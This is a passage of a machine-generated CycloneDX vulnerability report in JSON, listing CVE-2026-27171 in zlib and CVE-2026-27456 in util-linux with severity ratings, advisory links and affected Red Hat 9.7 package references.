          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-27171",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27171"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/"
        },
        {
          "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27171"
        },
        {
          "url": "https://github.com/advisories/GHSA-h858-mf2m-8jf4"
        },
        {
          "url": "https://github.com/madler/zlib/issues/904"
        },
        {
          "url": "https://github.com/madler/zlib/releases/tag/v1.3.2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27171"
        }
      ],
      "published": "2026-02-18T04:16:01+00:00",
      "updated": "2026-03-25T21:27:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.2.11-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-27456",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        59,
        269,
        367
      ],
      "description": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27456"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27456"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27456"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27456"
        }
      ],
      "published": "2026-04-03T22:16:25+00:00",
      "updated": "2026-04-22T16:08:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.37.4-21.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.37.4-21.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.37.4-21.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.37.4-21.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.37.4-21.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.37.4-21.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.37.4-21.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libfdisk@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/util-linux-core@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/util-linux@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libuuid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libblkid@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libmount@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libsmartcols@2.37.4-21.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
